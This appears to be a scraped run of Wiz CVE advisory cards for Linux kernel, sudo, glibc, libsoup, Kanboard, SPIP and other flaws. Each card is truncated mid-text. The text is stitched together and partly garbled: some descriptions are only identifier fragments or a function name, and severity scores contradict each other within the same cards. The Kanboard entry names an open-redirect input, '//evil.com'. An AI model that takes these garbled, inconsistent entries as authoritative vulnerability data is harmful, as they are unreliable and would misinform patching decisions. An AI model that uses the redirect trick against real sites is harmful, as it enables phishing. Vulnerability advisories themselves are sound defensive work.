last reference to this rawdata (by removing the corresponding profile,
for example), which frees its struct aa_loaddata; as a result, when
seq_rawdata_open() is reached, i_private is a dangling pointer and
freed memory is accessed.
The rawdata inodes weren't refcounted to avoid a circular refcount and
were supposed to be held by the profile rawdata reference. However
during profile removal there is a windo
Wiz
CVE-2022-50734 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50734 [MEDIUM] CVE-2022-50734 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50734 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nvmem: core: Fix memleak in nvmem_register()
dev_set_name will alloc memory for nvmem->dev.kobj.name in
nvmem_register, when nvmem_validate_keepouts failed, nvmem's
memory will be freed and return, but nobody will free memory
for nvmem->dev.kobj.name, there will be memleak, so moving
nvmem_validate_keepouts() after device_register() and let
the device core deal with cleaning name in error cases.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Ex
Wiz
CVE-2025-14946 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-14946 [MEDIUM] CVE-2025-14946 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14946 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libnbd. A malicious actor could exploit this by convincing libnbd to open a specially crafted Uniform Resource Identifier (URI). This vulnerability arises because non-standard hostnames starting with '-o' are incorrectly interpreted as arguments to the Secure Shell (SSH) process, rather than as hostnames. This could lead to arbitrary code execution with the privileges of the user running libnbd.
Source : NVD
## 4.8
Score
Published December 19, 2025
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7
Exploitation Probab
Wiz
CVE-2026-31396 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-31396 CVE-2026-31396 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31396 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: macb: fix use-after-free access to PTP clock
PTP clock is registered on every opening of the interface and destroyed on
every closing. However it may be accessed via get_ts_info ethtool call
which is possible while the interface is just present in the kernel.
BUG: KASAN: use-after-free in ptp_clock_index+0x47/0x50 drivers/ptp/ptp_clock.c:426
Read of size 4 at addr ffff8880194345cc by task syz.0.6/948
CPU: 1 PID: 948 Comm: syz.0.6 Not tainted 6.1.164+ #109
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.1-0-g3208b098f51a-prebuilt.qemu.org 04/01/2014
Call Trace: __dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x8d/0xb
Wiz
CVE-2026-23403 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23403 [MEDIUM] CVE-2026-23403 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23403 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix memory leak in verify_header
*ns = NULL
Remove the incorrect assignment.
The caller (aa_unpack) initializes *ns to NULL once before the loop,
which is sufficient.
Source : NVD
Published April 1, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-hwe
linux-hwe-5.4
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Apr 02, 2026
Echo Has Fix Added at: Apr 02, 2026
Ubuntu 16.04 Severity
Wiz
CVE-2023-53838 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-53838 [MEDIUM] CVE-2023-53838 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-53838 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: synchronize atomic write aborts
To fix a race condition between atomic write aborts, I use the inode
lock and make COW inode to be re-usable thoroughout the whole
atomic file inode lifetime.
Source : NVD
Published December 9, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 09, 2025
Echo Has Fix Added at: Dec 09, 2025
## Get a CVE risk assessment
Get
Wiz
CVE-2026-1767 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-1767 [MEDIUM] CVE-2026-1767 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1767 :
Linux Debian vulnerability analysis and mitigation
[Heap Buffer Overflow in GNOME localsearch MP3 Extractor]
Source : NVD
Published February 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tracker-miners
tracker-miners-lang
Sources
NVD
Debian 11 No Fix Added at: Feb 04, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Feb 04, 2026
Debian 14 Has Fix Added at: Feb 04, 2026
Echo No Fix Added at: Feb 04, 2026
Red Hat 8, 9, 10 Severity MEDIUM No Fix Added at: Feb 04, 2026
Ubuntu 22.04, 24.04, 25.10 Severity MEDIUM Has Fix
Wiz
CVE-2025-62602 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.7
CVE-2025-62602 [LOW] CVE-2025-62602 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62602 :
Linux Debian vulnerability analysis and mitigation
PID_IDENTITY_TOKEN
PID_PERMISSIONS_TOKEN
readOctetVector
vecsize
readData
length
vecsize
length
Source : NVD
## 1.7
Score
Published February 3, 2026
Severity LOW
CNA Score 1.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fastdds
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Nov 19, 2025
Debian 14 Severity HIGH No Fix Added at: Nov 19, 2025
Echo Severity HIGH No Fix Added at: Nov 19, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you
Wiz
CVE-2026-35535 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35535 [MEDIUM] CVE-2026-35535 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35535 :
Linux Debian vulnerability analysis and mitigation
In Sudo through 1.9.17p2 before 3e474c2, a failure of a setuid, setgid, or setgroups call, during a privilege drop before running the mailer, is not a fatal error and can lead to privilege escalation.
Source : NVD
## 7.4
Score
Published April 3, 2026
Severity HIGH
CNA Score 7.4
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
seal-sudo
sudo
Sources
NVD
Debian 11 Severity HIGH No Fix Added at: Apr 03, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Apr 03, 2026
Debian 14 Severity HIGH H
Wiz
CVE-2026-4046 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4046 [MEDIUM] CVE-2026-4046 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4046 :
Linux Debian vulnerability analysis and mitigation
The iconv() function in the GNU C Library versions 2.43 and earlier may crash due to an assertion failure when converting inputs from the IBM1390 or IBM1399 character sets, which may be used to remotely crash an application.
This vulnerability can be trivially mitigated by removing the IBM1390 and IBM1399 character sets from systems that do not need them.
Source : NVD
## 7.5
Score
Published March 30, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
glibc-langp
Wiz
CVE-2023-53900 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-53900 [MEDIUM] CVE-2023-53900 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-53900 :
Linux Debian vulnerability analysis and mitigation
Spip 4.1.10 contains a file upload vulnerability that allows attackers to upload malicious SVG files with embedded external links. Attackers can trick administrators into clicking a crafted SVG logo that redirects to a potentially dangerous URL through improper file upload filtering.
Source : NVD
Published December 16, 2025
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13
Exploitation Probability (EPSS) N/A
Affected packages and libraries
spip
Sources
NVD
Debian 11, 13, 14 Severity MEDIUM No Fix Added at: Jan 13, 2026
Echo Severity MEDIUM No
Wiz
CVE-2026-4948 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4948 [MEDIUM] CVE-2026-4948 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4948 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in firewalld. A local unprivileged user can exploit this vulnerability by mis-authorizing two runtime D-Bus (Desktop Bus) setters, setZoneSettings2 and setPolicySettings. This mis-authorization allows the user to modify the runtime firewall state without proper authentication, leading to unauthorized changes in network security configurations.
Source : NVD
## 5.5
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
firewal
Wiz
CVE-2026-0396 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.1
CVE-2026-0396 [LOW] CVE-2026-0396 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0396 :
Linux Debian vulnerability analysis and mitigation
An attacker might be able to inject HTML content into the internal web dashboard by sending crafted DNS queries to a DNSdist instance where domain-based dynamic rules have been enabled via either DynBlockRulesGroup:setSuffixMatchRule or DynBlockRulesGroup:setSuffixMatchRuleFFI.
Source : NVD
## 3.1
Score
Published March 31, 2026
Severity LOW
CNA Score 3.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sources
NVD
Debian 11, 12, 13 Severity LOW No Fix Added at: Apr 02, 2026
Debian 14 Severity
Wiz
CVE-2026-27894 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-27894 [HIGH] CVE-2026-27894 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27894 :
Linux Debian vulnerability analysis and mitigation
LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. Prior to version 9.5, a local file inclusion was detected in the PDF export that allows users to include local PHP files and this way execute code. In combination with GHSA-88hf-2cjm-m9g8 this allows to execute arbitrary code. Users need to login to LAM to exploit this vulnerability. Version 9.5 fixes the issue. Although upgrading is recommended, a workaround would be to make /var/lib/ldap-account-manager/config read-only for the web-server user and delete the PDF profile files (making PDF exports impossible).
Source : NVD
## 8.8
Score
Published March 18, 2026
Severity HIGH
CNA Scor
Wiz
CVE-2026-3632 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3632 [MEDIUM] CVE-2026-3632 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3632 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libsoup, a library used by applications to send network requests. This vulnerability occurs because libsoup does not properly validate hostnames, allowing special characters to be injected into HTTP headers. A remote attacker could exploit this to perform HTTP smuggling, where they can send hidden, malicious requests alongside legitimate ones. In certain situations, this could lead to Server-Side Request Forgery (SSRF), enabling an attacker to force the server to make unauthorized requests to other internal or external systems. The impact is low, as SoupServer is not actually used in internet infrastructure.
Source : NVD
## 5.5
Score
Published March 17, 2026
Severity MEDIUM
CNA Score 3.9
Af
Wiz
CVE-2026-35094 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.3
CVE-2026-35094 [LOW] CVE-2026-35094 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35094 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in libinput. An attacker capable of deploying a Lua plugin file in specific system directories can exploit a dangling pointer vulnerability. This occurs when a garbage collection cleanup function is called, leaving a pointer that can then be printed to system logs. This could potentially expose sensitive data if the memory location is re-used, leading to information disclosure. For this exploit to work, Lua plugins must be enabled in libinput and loaded by the compositor.
Source : NVD
## 3.3
Score
Published April 1, 2026
Severity LOW
CNA Score 3.3
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-23308 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23308 CVE-2026-23308 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23308 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
pinctrl: equilibrium: fix warning trace on load
The callback functions 'eqbr_irq_mask()' and 'eqbr_irq_ack()' are also
called in the callback function 'eqbr_irq_mask_ack()'. This is done to
avoid source code duplication. The problem, is that in the function
'eqbr_irq_mask()' also calles the gpiolib function 'gpiochip_disable_irq()'
This generates the following warning trace in the log for every gpio on
load.
[ 6.088111] ------------[ cut here ]------------
[ 6.092440] WARNING: CPU: 3 PID: 1 at drivers/gpio/gpiolib.c:3810 gpiochip_disable_irq+0x39/0x50
[ 6.097847] Modules linked in:
[ 6.097847] CPU: 3 UID: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.12
Wiz
CVE-2025-71242 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-71242 [MEDIUM] CVE-2025-71242 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71242 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.3.6, 4.2.17, and 4.1.20 allows unauthorized content disclosure in the private area. The application does not properly check authorization when displaying content of articles and sections (rubriques) in AJAX-loaded fragments, allowing an authenticated attacker to access restricted content. This vulnerability is not mitigated by the SPIP security screen.
Source : NVD
## 5.3
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
spip
S
Wiz
CVE-2025-71074 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2025-71074 [MEDIUM] CVE-2025-71074 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71074 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
functionfs: fix the open/removal races
ffs_epfile_open() can race with removal, ending up with file->private_data
pointing to freed object.
There is a total count of opened files on functionfs (both ep0 and
dynamic ones) and when it hits zero, dynamic files get removed.
Unfortunately, that removal can happen while another thread is
in ffs_epfile_open(), but has not incremented the count yet.
In that case open will succeed, leaving us with UAF on any subsequent
read() or write().
The root cause is that ffs->opened is misused; atomic_dec_and_test() vs.
atomic_add_return() is not a good idea, when object remains visible all
along.
To untangle that
*
Wiz
CVE-2026-31397 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-31397 CVE-2026-31397 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31397 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
mm/huge_memory: fix use of NULL folio in move_pages_huge_pmd()
move_pages_huge_pmd() handles UFFDIO_MOVE for both normal THPs and huge
zero pages. For the huge zero page path, src_folio is explicitly set to
NULL, and is used as a sentinel to skip folio operations like lock and
rmap.
In the huge zero page branch, src_folio is NULL, so folio_mk_pmd(NULL,
pgprot) passes NULL through folio_pfn() and page_to_pfn(). With
SPARSEMEM_VMEMMAP this silently produces a bogus PFN, installing a PMD
pointing to non-existent physical memory. On other memory models it is a
NULL dereference.
Use page_folio(src_page) to obtain the valid huge zero folio from the
page
Wiz
CVE-2026-23460 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23460 CVE-2026-23460 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23460 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net/rose: fix NULL pointer dereference in rose_transmit_link on reconnect
syzkaller reported a bug [1], and the reproducer is available at [2].
ROSE sockets use four sk->sk_state values: TCP_CLOSE, TCP_LISTEN,
TCP_SYN_SENT, and TCP_ESTABLISHED. rose_connect() already rejects
calls for TCP_ESTABLISHED (-EISCONN) and TCP_CLOSE with SS_CONNECTING
(-ECONNREFUSED), but lacks a check for TCP_SYN_SENT.
When rose_connect() is called a second time while the first connection
attempt is still in progress (TCP_SYN_SENT), it overwrites
rose->neighbour via rose_get_neigh(). If that returns NULL, the socket
is left with rose->state == ROSE_STATE_1 but rose->neig
Wiz
CVE-2026-21879 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-21879 [MEDIUM] CVE-2026-21879 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21879 :
Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below are vulnerable to an Open Redirect attack that allows malicious actors to redirect authenticated users to attacker-controlled websites. By crafting URLs such as //evil.com, attackers can bypass the filter_var($url, FILTER_VALIDATE_URL) validation check. This vulnerability could be exploited to conduct phishing attacks, steal user credentials, or distribute malware. The issue is fixed in version 1.2.49.
Source : NVD
## 6.1
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/
Wiz
CVE-2026-3196 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3196 [MEDIUM] CVE-2026-3196 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3196 :
Linux Debian vulnerability analysis and mitigation
two potential OOB memory accesses in virtio-snd
Source : NVD
Published March 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
qemu
Sources
NVD
Debian 11 No Fix Added at: Mar 03, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 03, 2026
Debian 14 Has Fix Added at: Mar 03, 2026
Echo No Fix Added at: Mar 03, 2026
Ubuntu 24.04, 25.10 Severity MEDIUM No Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can foc
Wiz
CVE-2026-0848 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2026-0848 [CRITICAL] CVE-2026-0848 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0848 :
Linux Debian vulnerability analysis and mitigation
NLTK versions <=3.9.2 are vulnerable to arbitrary code execution due to improper input validation in the StanfordSegmenter module. The module dynamically loads external Java .jar files without verification or sandboxing. An attacker can supply or replace the JAR file, enabling the execution of arbitrary Java bytecode at import time. This vulnerability can be exploited through methods such as model poisoning, MITM attacks, or dependency poisoning, leading to remote code execution. The issue arises from the direct execution of the JAR file via subprocess with unvalidated classpath input, allowing malicious classes to execute when loaded by the JVM.
Source : NVD
## 10
Score
Published March 5, 2026
Severity CRITICAL
Wiz
CVE-2026-23264 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23264 [MEDIUM] CVE-2026-23264 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23264 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
Revert "drm/amd: Check if ASPM is enabled from PCIe subsystem"
This reverts commit 7294863a6f01248d72b61d38478978d638641bee.
amdgpu_aspm
(cherry picked from commit 97a9689300eb2b393ba5efc17c8e5db835917080)
Source : NVD
Published March 18, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-hwe-6.17
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Mar 19, 2026
Echo Has Fix Added at: Mar 19, 2026
Ub
Wiz
CVE-2026-26079 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-26079 [MEDIUM] CVE-2026-26079 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26079 :
Linux Debian vulnerability analysis and mitigation
Roundcube Webmail before 1.5.13 and 1.6 before 1.6.13 allows Cascading Style Sheets (CSS) injection, e.g., because comments are mishandled.
Source : NVD
## 4.7
Score
Published February 11, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Feb 12, 2026
Echo Severity MEDIUM Has Fix Added at: Feb 12, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM
Wiz
CVE-2026-25531 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-25531 [MEDIUM] CVE-2026-25531 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25531 :
Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Prior to 1.2.50, The fix for CVE-2023-33968 is incomplete. The TaskCreationController::duplicateProjects() endpoint does not validate user permissions for target projects, allowing authenticated users to duplicate tasks into projects they cannot access. This vulnerability is fixed in 1.2.50.
Source : NVD
## 4.3
Score
Published February 13, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
kanboard
Source
Wiz
CVE-2026-5313 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5313 [MEDIUM] CVE-2026-5313 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5313 :
Linux Debian vulnerability analysis and mitigation
A vulnerability has been found in Nothings stb up to 2.30. This issue affects the function stbi__gif_load_next in the library stb_image.h of the component GIF Decoder. Such manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.3
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.9
Exploitation Probability (EPSS) N/A
Affected packa
Wiz
CVE-2026-23339 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-23339 [MEDIUM] CVE-2026-23339 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23339 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: free skb on nci_transceive early error paths
nci_transceive() takes ownership of the skb passed by the caller,
but the -EPROTO, -EINVAL, and -EBUSY error paths return without
freeing it.
Due to issues clearing NCI_DATA_EXCHANGE fixed by subsequent changes
the nci/nci_dev selftest hits the error path occasionally in NIPA,
and kmemleak detects leaks:
unreferenced object 0xff11000015ce6a40 (size 640):
comm "nci_dev", pid 3954, jiffies 4295441246
hex dump (first 32 bytes):
6b 6b 6b 6b 00 a4 00 0c 02 e1 03 6b 6b 6b 6b 6b kkkk.......kkkkk
6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b kkkkkkkkkkkkkkkk
backtrace (crc 7c40cc2a):
kmem_cache_allo
Wiz
CVE-2023-54307 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54307 [MEDIUM] CVE-2023-54307 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54307 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ptp_qoriq: fix memory leak in probe()
Smatch complains that:
drivers/ptp/ptp_qoriq.c ptp_qoriq_probe()
warn: 'base' from ioremap() not released.
Fix this by revising the parameter from 'ptp_qoriq->base' to 'base'.
This is only a bug if ptp_qoriq_init() returns on the
first -ENODEV error path.
For other error paths ptp_qoriq->base and base are the same.
And this change makes the code more readable.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.8
Wiz
CVE-2018-25153 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2018-25153 [MEDIUM] CVE-2018-25153 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2018-25153 :
Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority as the reported issue does not constitute a security vulnerability and represents a minor, non-exploitable memory leak.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
barcode
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW No Fix Added at: Dec 26, 2025
Echo Severity HIGH No Fix Added at: Dec 26, 2025
## Get a CVE risk assessment
Get a prioritized view of
Wiz
CVE-2026-3634 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3634 [MEDIUM] CVE-2026-3634 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3634 :
Linux Debian vulnerability analysis and mitigation
soup_message_headers_set_content_type()
Source : NVD
## 6.5
Score
Published March 17, 2026
Severity MEDIUM
CNA Score 3.9
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libsoup3
libsoup3-devel
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 09, 2026
Echo Severity MEDIUM No Fix Added at: Mar 09, 2026
Red Hat 6, 7, 8, 9, 10 Severity MEDIUM No Fix Added at: Mar 08, 2026
Red Hat 7 Severity MEDIUM Has Fix Added at: Mar 08, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04,
Wiz
CVE-2026-23330 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-23330 [MEDIUM] CVE-2026-23330 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23330 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: complete pending data exchange on device close
In nci_close_device(), complete any pending data exchange before
closing. The data exchange callback (e.g.
rawsock_data_exchange_complete) holds a socket reference.
NIPA occasionally hits this leak:
unreferenced object 0xff1100000f435000 (size 2048):
comm "nci_dev", pid 3954, jiffies 4295441245
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
27 00 01 40 00 00 00 00 00 00 00 00 00 00 00 00 '..@............
backtrace (crc ec2b3c5):
__kmalloc_noprof+0x4db/0x730
sk_prot_alloc.isra.0+0xe4/0x1d0
sk_alloc+0x36/0x760
rawsock_create+0xd1/0x540
